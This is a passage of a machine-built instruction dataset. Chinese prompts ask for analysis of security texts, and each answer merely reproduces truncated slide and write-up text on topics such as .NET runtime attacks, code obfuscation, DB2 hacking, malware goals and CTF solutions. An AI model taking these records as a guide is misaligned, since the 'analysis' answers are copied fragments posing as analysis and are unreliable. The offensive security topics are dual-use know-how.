you cant  Decryption  Turning something you cant read into something you can Stream and Block ciphers Stream  Encrypt one character at a time  Key is ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n刘柏江 几维安全创始人兼CTO IoT时代LLVM编译器防护的艺术 目录 万物互联代码安全先行 01 传统代码保护LLVM安全编译器 02 03 混淆块调度代码虚拟化 万物互联安全先行 物理安全 防止丢失或者被盗 业务安全 防止用户隐私数据泄漏 系统安全 防止底层漏洞被恶意利用 策略安全 万物互联代码安全先行 防逆向 打配合 提高门槛 争取时间 防止核心算法被重构 提升策略安全的强度 提高破解成本将逆向菜鸟拒之门外 加大破解难度延长破解时间为 运营争取更多的有利窗口期 物联网时代即将开启 Android Things 让您可以为各种消费者 零售和工业应用程序构 建智能互联设备 AliOS Things 面向IoT领域的轻量级物 联网嵌入式操作系统 可广泛应用在智能家居 智慧城市新出行等领 域 DuerOS 可以广泛支持手机电 视音箱汽车机器 人等多种硬件设备 IoT.MI 小米IoT开发者平台面向 智能家居智能家电 健康可穿戴出行车载 等领域 芯片体系越来越多 互联网 WindowsMacOSLinux x86 x86-64 移动互联网 iOSAndroid x86 arm arm64 物联网 AndroidAliOS Things x86 x86-64 arm arm64 mips mips64 stm32 avr bpf hexagon lanai nvptx riscv sparc systemz csky 运行内存越来越少 互联网 WindowsMacOSLinux 256KB-1GB 移动互联网 iOSAndroid 512MB-8GB 物联网 AndroidAliOS Things 2GB-16GB 物联网操作系统运行环境 跑在种类繁多的芯片架构上 受限于功耗硬件性能低下 运行在内存一般偏小的环境 概念科普 黑盒代码加密 处理的对象是最终的软件执行体比 如Windows的EXEAndroid的SO 以及DEX 白盒代码加密 处 理 的 对 象 是 源 代 码  比 如 C/C++/Objective-C / Swif t 这 类 语 言 的 源 代 码 文 件 黑盒代码加密的应用 比 如 适 用 于 Windows  LinuxAndroid的UPX壳 比如利用x86指令集的可变 长特性增加误导反汇编程序 的垃圾指令 比 如 Windows 非 常 著 名 的 VMProtect 比如Android的DEX整体加 解密类抽取 A C B D 加壳 加花指令 加虚拟机 劫持 运行时 黑盒代码加密的局限 可移植性差 兼容性差 很难对多端且同源的代码做一致性的保护 芯片架构不兼容内存需求显著增加 很难适应新的像IoT这样的平台 对于像Android这类高碎片化的平台干预 运行时意味着兼容性极差 对于像iOS这类完全封闭的平台干预运行 时意味着方案没法工作 LLVM编译器登场 前端 源代码 LLVM是模块化可复用的编译器工具链集合最初是伊利诺伊大学的一个研究项目 其目标是提供一种现代的基于SSA的编译策略能够支持任意编程语言的静态和动态 编译 IR处理 LLVM-IR 后端 LLVM-MIR 目标文件 Object LLVM-IR 函数 模块 IR指令 基本块 LLVM提供了完整的IR文件操作API可以对IR文件的模块函数基本块IR指令做任意修改 || 架构信息 全局数据 函数申明 函数实现 编译元数据 || 函数申明 变量申明 代码块 || IR指令序列 || 算术指令 逻辑指令 控制指令 ...... 挖掘LLVM-IR的潜能 架构无关 可以适应任意芯片架构 方案丰富 可以满足任意要求的安全级别 函数粒度 可以适应低内存运行环境 初级防护 原始流程图 混淆流程图 高级防护 原始流程图 块调度流程图 代码虚拟化KIWIVM KiwiVM代码虚拟化编译器基于LLVM编译器中间层实现通过设计独有保密的虚拟CPU指令将原始CPU指令进行加 密转换为只能由KiwiVM解释执行的虚拟指令能够完全隐藏函数代码逻辑让代码无法被逆向工程 虚拟CPU执行 函数保护粒度 全平台全架构 100%兼容性 KIWIVM转换过程 LLVM-BC 源文件 Clang KiwiVM 源文件 KiwiVM的中心思想是利用LLVM-BC编码成自定义虚拟CPU的指令集和元数据包括指令集数据重定位数据函数调用 签名数据等 || C C++ ObjC || BC函数列表 || 功能等价的C || 生成最终的 Obj文件 KIWIVM转换样例 旗舰防护 原始流程图 虚拟机流程图 差异对比 混淆 块调度 代码虚拟化 结束之前 几维安全编译器产品简介 级别 功能 平台 混淆编译器 初级 代码膨胀 乱序执行 iOSAndroidIoT 块调度编译器 高级 逻辑断链 函数", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKatana: Portable Multi-Boot Security Suite JP Dunning DefCon 2010  Shadow Cave LLC JP Dunning Graduate Student: Computer Science, Virginia Tech Research Focus: Wireless and Portable Security Website: www.hackfromacave.com  Shadow Cave LLC To Many Tools!  Finding Tools  Cases of CDs  Keeping up with disks  Tools on different devices  Using different Operating Systems  Indecent Response  Need It Now!  Shadow Cave LLC Katana  Run from USB Flash Drive  No partitioning necessary  Security Tools:  Katana Tool Kit: 100s of portable Windows applications  Katana Live: A dozen Live Distributions  Consolidation of tools onto one medium  User configurable list of security related tools  Add, Remove, Update  Shadow Cave LLC CD vs USB Attribute CD/DVD USB Flash Drive Write Speed ~ 5 MB/s (32x) / ~ 21 MB/s (16x) ~ 25 MB/s Read Speed ~ 8 MB/s (52x) / ~ 26.5/s (20x) ~ 35 MB/s Transfer Rate X * (150kb/s) ~ 60 MB/s Environment Static Dynamic BIOS Boot Support Early 90's Early 00's Disk Space 700MB/4.7GB 128 MB256 GB Physical Space ~ 12x12x0.1 cm ~ 4x1.5x0.5 cm Time To Failure ~ 1,000 writes OR 3  5 years ~ 10,000 to 100,000 writes OR 5 to 10 years Bootable Tools More Less  Shadow Cave LLC Who Made The Cut?  Security related  Free (at least for personal use)  Unique contribution  Currently supported  Shadow Cave LLC Katana Live  Shadow Cave LLC Katana Included Distros  Backtrack  Ultimate Boot CD  UBCD4Win  Ophcrack  Puppy  CAINE  CloneZilla  Trinity Rescue Kit  Derik's Boot and Nuke  Kon-Boot  Shadow Cave LLC Getting the Darn Thing to Work  Boot loader syslinux  USB bootloader  Binary Configuration file editing  Initd file  Clean Up  Minimizing the mess of folders and files  Shadow Cave LLC Add Your Own Distros  Each distro requires different modifications  Often change to init file  Modify cfg menu file  Change file/directory names and structures  Shadow Cave LLC Example: Adding Samurai 0.8 1) Download Samurai from: samurai.inguardians.com 2) Extract/Burn Samurai ISO 1) Extract using", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacking .NET Applications at Runtime Jon McCoy - 2010 www.DigitalBodyGuard.com What will this presentation cover? How to pWN closed-source .NET applications in new and dynamic ways New tools I am releasing Show how incredibly vulnerable .NET applications are What tools will you get? New Metasploit payload Tools to do reconnaissance, on the structure of .NET programs Beta - Decompilation Tool targeted at . NET Applications protected by wrappers/shells What will the hack do? Gain access to a target application Compromise the GUI Subvert core logic Instantiate new features Access the Object structure Connect to the Target Inject - Put your code into the target Infect - Change the target's code Exploit - Take advantage of a flaw Attack The Framework - Compromise the framework How the hack works: Overview 1. Connect to the target application -Connect With Injection 2. Access targets Object structure -Move around with Reflection 3. Modify values and/or Objects -Modify Objects with Reflection Normal Runtime Object Structure GUI Hacked Object Runtime Structure GUI Sample Code: Hack Event Reflection DEMO GUI_Spike LEET a Program VIDEO OF DEMO HACKS NOT LIVE DUE TO TIME APPLICATION Live demo Data Piggyback SQL FIN < NULL Special Thanks To Related Works of James Devlin www.codingthewheel.com Sorin Serban www.sorin.serbans.net/blog Erez Metula paper: .NET reverse engineering & .NET Framework Rootkits Thanks to assistance of Lynn Ackler Thank you for the mentorship and training in forensics. Daniel DeFreez Thank you for the help on research and vulnerability analysis (also the metasploit module) :-) Andrew Krug Thank you for the advanced IT support & shinyness. Adam REDACTED Thanks you for the IT Support; specifically hardware. License DotNetSpike and This Presentation are Licensed Under GNU General Public License - Ver. 3, 29 June 2007 This is an open source presentation presented at Defcon 18 with Tools released at Blackhat 2010 More information at: http://www.DigitalbodyGua", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAutomating Vulnerability Assessments with Vuls | HITCON CMT 2017 Automating Vulnerability Assessments with Vuls Kota KANBE & Teppei FUKUDA HITCON CMT 2017 2 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 Vuls open-source, agent-less vulnerability scanner (based on information from NVD, OVAL, etc.) Managed System matching Notify via e-mail, slack Analyze results Vulnerability DB Installed Software errata changelog 3 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 Vuls Features In-Depth 4 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 Administrator On-Premise Azure 5 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 6 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 7 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 On-Premise Azure 8 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 Administrator 9 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 10 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 11 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 12 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 Supported OS Ubuntu 12, 14, 16 Debian 7, 8, 9 RHEL 5, 6, 7 Oracle Linux 5, 6, 7 CentOS 6, 7 Amazon Linux All FreeBSD 10, 11 Raspbian Jessie, Stretch 13 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 14 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 !! Administrator 15 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 16 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 Agent-less 17 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 ssh Scan Remote Scan ssh ssh 18 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 Local Scan ssh Scan 19 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 DEMO Lets see just how easy it is to use Vuls 20 Automating Vulnerability Assessments with Vuls | HITCON ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage com.vulhub.authzvuln; import org.springframework.boot.builder.SpringApplicationBuilder; import org.springframework.boot.web.servlet.support.SpringBootServletInitializer; import org.springframework.context.annotation.ComponentScan; @ComponentScan(basePackages = {\"com.vulhub.authzvuln\"}) public class ServletInit extends SpringBootServletInitializer { @Override protected SpringApplicationBuilder configure(SpringApplicationBuilder application) { return application.sources(App.class); } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCentral bank digital currency Threats and vulnerabilities Defcon 29 Ian Vitek CBDC Security Central bank of Sweden, Sveriges Riksbank Central bank digital currency Threats and vulnerabilities Presentation Background Detailed system description of the prototype Vulnerabilities in the retail central bank digital currency prototype Everything else Solutions and summary 2 So where do we start? Ian Vitek  Started with pentests 1996.  Interested in web application security, network layer 2 (the writer of macof), DMA attacks and local pin bypass attacks (found some on iPhone). Sveriges Riksbank (Central bank of Sweden) Disclaimer: The views and opinions expressed in this presentation are those of the presenter and do not necessarily represent the views and opinions of the Riksbank. 3 The e-krona project  Why central bank digital currency?  Procurement  Requirements  Winning bid  Work on the prototype phase 1 (year one) The goal of this presentation is to share insights of the security challenges of building a prototype of a two tier retail central bank digital currency. 4 Detailed system description of the prototype 5 Detailed system description of the prototype User 6 Detailed system description of the prototype App User Security and logic, e.g.  PIN  Signing transactions  Encryption 7 Detailed system description of the prototype App Disk User Security and logic, e.g.  PIN  Signing transactions  Encryption Storage of  PIN  Private key for tokens  Authentication keys  Message keys, e.g. Firebase 8 Detailed system description of the prototype App Disk Security and logic, e.g.  PIN  Signing transactions  Encryption Storage of  PIN  Private key for tokens  Authentication keys  Message keys, e.g. Firebase 9 Detailed system description of the prototype App Disk PSP1 business logic Security and logic, e.g.  Authentication  Push messages, e.g. Firebase  Limits  Back office functions 10 Detailed system description of the prototype App Disk PSP1 business logic DB Security and logic", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# DefCamp CTF 2019 Finals Team: chivay, des, nazywam, sasza, shalom ### Table of contents * [Crypto (crypto)](crypto) * [Simple-notes (web)](simple-notes) * [Lucky (web)](lucky) * [Treasure map (for/osint)](treasure-map) ![](scoreboard.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n時間 題目 主講者 13:00 - 13:30 記者會  VulReport 發表會 Sylphid Su 13:30 - 14:00 聽眾報到 14:00 - 14:30 開場及 2014 年度回顧 / HITCON 2015 TT 14:30 - 15:00 2014 年台灣企業安全常見風險剖析 Bowen Hsu 15:00 - 15:20 下午茶 15:20 - 15:50 駭客如何弄垮企業 從索尼影業與南韓核電廠事件說起 GasGas / Fyodor 15:50 - 16:40 Operation GG 台灣最熱門網遊安裝檔 驚見網軍後門 Kenny / PK / Kaspersky Trend Micro 16:40 - 17:40 座談 TT @ HITCON.org Free Talk 2015.01.09 致 謝 Live broadcasting 公民攝影守護民主陣線 注意事項 可以拍照但只能對著台上拍 不可以錄影 會議室內禁止飲食 手機請調成靜音 連 wifi 自己要小心 不要踢到攝護線 台灣駭客年會默默的推動國家資安的發展 數百場世界頂尖資安研究分享 國際大廠持續關注台灣資安研究 國內外資安社群交流 讓更多人願意關注資安, 學習資安 我們把國外高手, 廠商, 帶來台灣 也把台灣的優秀研究, 推向國際 傳遞最新資安訊息 HITCON Free Talk 2014 回顧與 2015 展望 HITCON CTF 戰隊 CHROOT / HITCON 實習生計畫 2015 ? HITCON Junior HITCON Junior 計畫 走出台北到各地或校園推廣資安 我們歡迎各地資安社團與我們聯繫 近期推出請密切注意 HITCON Facebook 也徵求贊助商 2014 的資安狀況? 2014  The Year of 0day Legacy Vulnerabilities CVE - 2014 - 0160 Heartbleed OpenSSL Critical information leakage CVE - 2014 -1761 Microsoft Office Word RTF Document CVE - 2014 -1776 Internet Explorer 0day Spear phishing with waterhole attack CVE - 2014 - 6271 Shellshock 25 years old CVE - 2014 - 7169 CVE - 2014 - 4114 Sand Worm Microsoft Office Powerpoint Logical flaw MS-12-005 CVE - 2014 - 6332 Internet Explorer 19 years IE 3.0 - IE 11 Windows 95 - Windows 8.1 GG 的一年 時間 題目 主講者 13:00 - 13:30 記者會  VulReport 發表會 Sylphid Su 13:30 - 14:00 聽眾報到 14:00 - 14:30 開場及 2014 年度回顧 / HITCON 2015 TT / Alan 14:30 - 15:00 2014 年台灣企業安全常見風險剖析 Bowen Hsu 15:00 - 15:20 下午茶 15:20 - 15:50 駭客如何弄垮企業 從索尼影業與南韓核電廠事件說起 GasGas / Fyodor 15:50 - 16:40 Operation GG 台灣最熱門網遊安裝檔 驚見網軍後門 Kenny / PK / Kaspersky Trend Micro 16:40 - 17:40 座談", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhistory === 显示或操作历史列表 ## 概要 ```shell history [-c] [-d offset] [n] history -anrw [filename] history -ps arg [arg...] ``` ## 主要用途 - 显示历史列表 - 操作历史列表 ## 选项 ```shell -c 清空历史列表 -d offset 根据offset删除记录如果是正数则表示offset位置的记录如果为负数则表示从结尾向前offset位置的记录 -a 将当前终端的历史记录行添加到历史记录文件 -n 将尚未从历史文件中读取的历史行追加到当前历史列表中 -r 读取历史文件并将其内容附加到历史列表中 -w 将当前历史记录列表附加到历史记录文件中并且附加它们到历史列表中 -p 在每个arg上执行历史记录扩展并在标准输出上显示结果而不将结果存储在历史记录列表中 -s 将每个arg作为单个条目附加到历史记录列表 ``` ## 参数 n可选只列出最近的n条记录 filename可选表示历史文件默认调用顺序为`filename`环境变量`HISTFILE``~/.bash_history` ## 返回值 返回成功除非提供了非法选项或出现了错误 ## 例子 使用history命令显示最近使用的 5 条历史命令 ```shell [root@localhost ~]# history 5 97 cd .ssh/ 98 ls 99 cat known_hosts 100 exit 101 history 10 ``` 清空历史记录 ```shell [root@localhost ~]# history -c ``` 删除制定的行 ```shell [root@localhost ~]# history -d <指定行号> [root@localhost ~]# history -d 2243 ``` 快捷执行一条历史命令 ```shell # 执行第 n 条历史命令 [root@localhost ~]# !n # 执行最后一条 xxx 开头的命令 [root@localhost ~]# !xxx ``` ### 注意 1. 在命令行中可以使用符号`!`执行指定序号的历史命令例如要执行第2个历史命令则输入`!2` 2. 关闭终端后历史列表将被写入历史文件`~/.bash_history` 3. 环境变量`HISTSIZE`决定了历史文件中命令的存储数量默认存储1000条 4. 环境变量`HISTTIMEFORMAT`如果是非空值则使用其值作为`strftime(3)`打印相关时间戳的格式字符串添加在每个显示的历史记录之前否则不会打印时间戳 5. 该命令是bash内建命令相关的帮助信息请查看`help`命令", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2003-2007 Check Point Software Technologies Ltd. All rights reserved. Proprietary and confidential. puresecurity A Crazy Toaster : Can Home Devices turn against us? A Crazy Toaster : Can Home Devices turn against us? Dror Shalev SmartDefense Research Center drors@checkpoint.com 2 2003-2007 Check Point Software Technologies Ltd. All rights reserved. Proprietary and confidential. puresecurity Agenda Agenda Introduction Trust, technology and new privacy issues Overview of home networking and early threats Steps to create a Crazy Toaster Trojan Demonstration Side effect : Windows XP SSDP distributed Dos Side effect Demonstration TODO, Extended ideas Respect Q&A 3 2003-2007 Check Point Software Technologies Ltd. All rights reserved. Proprietary and confidential. puresecurity Introduction Introduction 4 2003-2007 Check Point Software Technologies Ltd. All rights reserved. Proprietary and confidential. puresecurity Introduction Introduction Mission: World domination via single UDP packet Do we care if our home Toaster sees us Naked? Can Home Devices turn against us, spy on our Network? Privacy and trust issues raised by technology, New hardware & Cool devices 5 2003-2007 Check Point Software Technologies Ltd. All rights reserved. Proprietary and confidential. puresecurity Trust, technology & privacy issues Trust, technology & privacy issues Common privacy issues:  Technology is about to replace the trust model we use today  People get confused between people that know things and machines that know things  Do we care if Google machines know that we would like to pay for porn?  Does this information can be given to a human? Trust models:  Usually we dont trust a human in 100% to be able to deal with his knowledge about us  Should we trust corporations like Google?  Should we trust hardware and software vendors? 6 2003-2007 Check Point Software Technologies Ltd. All rights reserved. Proprietary and confidential. puresecurity Overview of home networking Overview of home networ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModule 2 Typical goals of malware and their implementations https://github.com/hasherezade/malware_training_vol1 Introduction Malware: missions and tactics Malware: missions and tactics  First questions that we need to answer analyzing malware: WHAT?  What is the main purpose (mission) of tha malware?  What is the malware family?  Other questions that follow: HOW?  How are the goals implemented?  Are the used techniques novel/similar to known implementations?  Possible actor: WHO?  Cybercrime? Nation-State? Level of sophistication? Malware: missions  Most common malware missions:  Extortion (ransomware)  Financial fraud and stealing of credentials (i.e. Banking trojans, card number stealers)  Long-run espionage operations (RATs, spyware)  Short run-espionage operations (stealing documents)  Botnets for other attacks (i.e. DDoS bots, spamming bots, click-fraud, loading of secondary malware)  Illegitimate usage of resources (i.e. proxy botnets, cryptocurrency miners)  Sometimes multiple goals can be implemented in one executable Malware: families  Trending malware families  https://any.run/malware-trends/  https://blog.malwarebytes.com/reports/2020/02/malwarebytes-labs-releases-2020-state-of- malware-report/ Malware: tactics  MITRE database (https://attack.mitre.org/tactics) set of common tactics used by malware  Depending on malware family, the authors may be interested in achieving different goals, i.e.  Persistence  Defense Evasion  Stealing Credentials  Exfiltration  Lateral Movements  Manipulation/Destruction Malware: tactics From: https://attack.mitre.org/tactics", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFeline Entropy Project Defcon XV Nick Kryptr nkryptr@classful.net What this is NOT: A discussion of political reality: -Any eg. Trusted Computing Initiative will necessarily involve key escrow or similar sophomoric attempt to subvert user security and privacy. -That a large telco recently admitted to transporting wheelbarrowloads of data snarfed with span ports onto magnetic tape directly into the waiting arms of a well-known TLA says more about user apathy than cryptographic insecurity. A criticism of ex machina randomness: -With the publication of RFC4086/BCP106, randomness has become a standard. -Little attention has been paid to the black art of entropy of late, as ever-greater CPU clock speed has brought us measurement of hardware noise with seemingly quantum granularity. -Given the audience's particular penchant for system security (or lack thereof), it is incumbent upon the hacker community to punch holes in the basic premise, namely that hardware under the control of a potentially compromised operating system can be trusted. -\"Law RNG-2: Anyone who uses software to produce random numbers is in a state of sin. [John von Neumann]\" (Wagner, pp. 99) What this is NOT: A reference Design: -Nothing presented here should prompt anyone to try this at home, or to trust entropy bits thusly generated, as being cryptographically secure. -(Patent pending.) -((Hey, if that laser pointer guy can get away with it...)) What this is NOT: What this IS: -An examination of the considerations and challenges inherent in solving the problem of reliable cryptographic entropy -extra machina -on a relatively low budget -using COTS materials Why? -extant methods use hardware intrinsic to the system, in theory, all systems are pwned, therefore these entropy methods suck. -extant methods are insufficiently complicated. -no amount of legislation a la Patriot Act, or rubber-hose cryptanalysis, can persuade a cat to confess. -cat /dev/cat - how postmodern. Entropy: Traditionally accepted def", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBSD Security Fundamentals Sean Lewis sml@subterrain.net http://www.subterrain.net Scope and Scale  Focus: FreeBSD - enterprise hardware support and most 'mainstream' of the open source BSD trees.  Security refresher and some new and interesting BSD security information.  Emphasis on host-based security, one of the first layers of the security 'onion' complimented with network-level security [defense in-depth]. BSD  making inroads in the Enterprise market  BSD and systems w/ BSD frameworks being deployed in the enterprise and with the end user.  Nokia firewalls - run FireWall-1 on IPSO [based on FreeBSD 3.2]  Juniper's Internet backbone router products, designed for high-growth, high-capacity networks, use code from FreeBSD.  Other commercial BSD implementors include Yahoo! and LinkExchange The Basics  If modifying an existing system, especially in a production environment, make backups!  Unnecessary services - go through /etc/inetd.conf and rc.conf; disable what you don't need [inetd.conf now shipped with everything off by default] [rc.conf - disable sendmail, SMTP and submission ports 25/587]  Work with the latest version of the OS - tracking STABLE is the best idea Encrypted Communications  Disable telnet (default in recent FreeBSD releases) and enable SSH. OpenSSH is included in the FreeBSD base system.  Upgrade all your systems to OpenSSH 3.4p1 and use SSH version 2 with privilege separation.  Enable the sftp subsystem built into the SSHv2 protocol rather than a standard ftpd implementation if possible.  Set up public key authentication with SSH [DSA keys!] to prevent password transmission, encrypted or otherwise! File System Lockdown  Partition out as much as possible; /, /usr, /var, /tmp at a minimum. /home and /usr/local should be considered as well.  Mount non /usr or / [for /sbin] filesystems with the 'nosuid' argument, especially /tmp.  Search for and remove suid bits off of non- used binaries [especially uucp - setgid]  Use the chflags to set variables su", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Corrupted Quack Category: Forensics ## Description > DuckyDebugDuck's sister sent him a picture from her vacation to Canada, but it got corrupted, can you fix it? A `*.png` file was attached. ## Solution Let's check the file with some basic tools: ```console root@kali:/media/sf_CTFs/technion/Corrupted_Quack# pngcheck corrupted_quack.png corrupted_quack.png this is neither a PNG or JNG image nor a MNG stream ERROR: corrupted_quack.png root@kali:/media/sf_CTFs/technion/Corrupted_Quack# file corrupted_quack.png corrupted_quack.png: data ``` Neither `file` nor `pngcheck` can recognize this file as a PNG file. This means that something very basic in the file signature is corrupted. According to the [specs](https://en.wikipedia.org/wiki/Portable_Network_Graphics), a PNG file should start with the magic number `89 50 4e 47 0d 0a 1a 0a`. What does our file start with? ```console root@kali:/media/sf_CTFs/technion/Corrupted_Quack# xxd -g 1 corrupted_quack.png | head -n 1 00000000: 51 55 41 43 4b 4b 4b 4b 00 00 00 0d 44 55 43 4b QUACKKKK....DUCK ``` That doesn't seem right. Let's fix the first 8 bytes according to the known signature: ```console root@kali:/media/sf_CTFs/technion/Corrupted_Quack# printf '\\x89\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a' | dd conv=notrunc of=corrupted_quack.png bs=1 seek=0 8+0 records in 8+0 records out 8 bytes copied, 0.00238445 s, 3.4 kB/s root@kali:/media/sf_CTFs/technion/Corrupted_Quack# xxd -g 1 corrupted_quack.png | head -n 1 00000000: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 44 55 43 4b .PNG........DUCK root@kali:/media/sf_CTFs/technion/Corrupted_Quack# pngcheck corrupted_quack.png corrupted_quack.png first chunk must be IHDR ERROR: corrupted_quack.png ``` This looks a bit better, but still not exactly right: `pngcheck` tells us that the first chunk must be of type `IHDR` (and not `DUCK`). Let's fix that: ```console root@kali:/media/sf_CTFs/technion/Corrupted_Quack# printf 'IHDR' | dd conv=notrunc of=corrupted_quack.png bs=1 seek=12 4+0 records in 4+0 recor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# gogo Category: Reverse Engineering, 110 points ## Description > Hmmm this is a weird file... A binary file was attached. ## Solution Let's run the attached file: ```console (user@kali)-[/media/sf_CTFs/pico/gogo] $ ./enter_password Enter Password: test ``` So we need to find the password. Let's check the disassembly with Ghidra. We can see that there's a function called `checkPassword`: ```c void __regparm1 main.checkPassword(undefined4 param_1,int param_2,uint param_3,undefined param_4) { uint *puVar1; uint i; undefined4 uVar2; int correct_chars; int *in_GS_OFFSET; undefined4 local_40; undefined4 local_3c; undefined4 local_38; undefined4 local_34; undefined4 local_30; undefined4 local_2c; undefined4 local_28; undefined4 local_24; byte local_20 [28]; undefined4 uStack4; puVar1 = (uint *)(*(int *)(*in_GS_OFFSET + -4) + 8); if (register0x00000010 < (undefined *)*puVar1 || (undefined *)register0x00000010 == (undefined *)*puVar1) { uStack4 = 0x80d4b72; uVar2 = runtime.morestack_noctxt(param_1); main.checkPassword(uVar2,param_2,param_3,param_4); return; } if ((int)param_3 < 0x20) { os.Exit(param_1,0); } FUN_08090b18(0); local_40 = 0x38313638; local_3c = 0x31663633; local_38 = 0x64336533; local_34 = 0x64373236; local_30 = 0x37336166; local_2c = 0x62646235; local_28 = 0x39383338; local_24 = 0x65343132; FUN_08090fe0(); i = 0; correct_chars = 0; while( true ) { if (0x1f < (int)i) { if (correct_chars == 0x20) { return; } return; } if ((param_3 <= i) || (0x1f < i)) break; if ((*(byte *)(param_2 + i)  *(byte *)((int)&local_40 + i)) == local_20[i]) { correct_chars = correct_chars + 1; } i = i + 1; } runtime.panicindex(); do { invalidInstructionException(); } while( true ); } ``` In this function, we see a loop performing a XOR between two characters and checking them against some expected output. In assembly, it looks like this: ```assembly 0x080d4b18 <+152>: movzx ebp,BYTE PTR [ecx+eax*1] 0x080d4b1c <+156>: cmp eax,0x20 0x080d4b1f <+159>: jae 0x80d4b66 <main.checkPassword+230>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking and Securing DB2 LUW Alexander Kornbrust  Red-Database-Security GmbH Table of Content  Information  Known DB2 LUW Exploits  Vulnerabilities in custom DB2 code  Accessing the OS from the DB  Hardening DB2  Summary Information  Version History  Where to get DB2 LUW  Pre-installed DB2 Image(s)  Architecture  How to connect to DB2 Version History 9.7 (Cobra) DB2 9.7 for LUW Released 9.7.4 19-Apr-2011 9.7.3a 02-Dec-2010 9.7.3 10-Sep-2010 9.7.2 28-May-2010 9.7.1 24-Nov-2009 9.7.0 28-Aug-2009 End of Support 20-Sep-2014 Extended Support 30-Sep-2017 Version History 9.5 (Viper 2) DB2 9.5 for LUW Released 9.5.7 13-Dec-2010 9.5.6 27-Aug-2010 9.5.5 14-Dec-2009 9.5.4 25-May-2009 9.5.3 08-Dec-2008 9.5.2a 23-Sep-2008 9.5.2 22-Aug-2008 9.5.1 11-Apr-2008 9.5.0 14-Dec-2007 End of Support 30-Apr-2013 Extended Support 30-Apr-2016 Version History 9.1 (Viper) DB2 9.5 for LUW Released 9.1.10 18-Feb-2011 9.1.9 08-Apr-2010 9.1.8 28-Sep-2009 9.1.7 30-Mar-2009 9.1.6 14-Oct-2008 9.1.5 30-May-2008 9.1.4 13-Nov-2007 9.1.3 15-Aug-2007 9.1.0 22-Sep-2006 End of Support 30-Apr-2012 Extended Support 30-Apr-2015 Where to get DB2 LUW Download from IBM (requires account)  Free Express Edition (various platforms) http://www.ibm.com/developerworks/ downloads/im/udbexp/index.html  Trial Versions https://www14.software.ibm.com/webapp/iwm/ web/reg/pick.do?source=swg-dm-db297trial Older versions of DB2 are difficult to find for non-IBM customers. Pre-installed DB2 Image(s)  DB2 9.7.2 - Dubuntu (Ubuntu 10.04 LTS) http://db2hitman.wordpress.com/dubuntu- server-v4/  DB2 9.5 Express-C (Suse Linux 10.0) http://www.vmware.com/appliances/directory/ 109333  DB2 9.7.1 Data Server (Sue Linux Enterprise 11) https://www14.software.ibm.com/webapp/iwm/ web/reg/pick.do?source=swg-dm-db297trial DB2 - Architecture How to connect to DB2  Command Line: 1. Connecting to an DB2 LUW using CLP C:\\> db2cmd c:\\> db2 db2 => db2 connect to sample db2 => SELECT * FROM SYSIBMADM.ENV_PROD_INFO How to connect to DB2 Known DB2 Exploi", "category": "text_analysis", "source": "security_papers"}
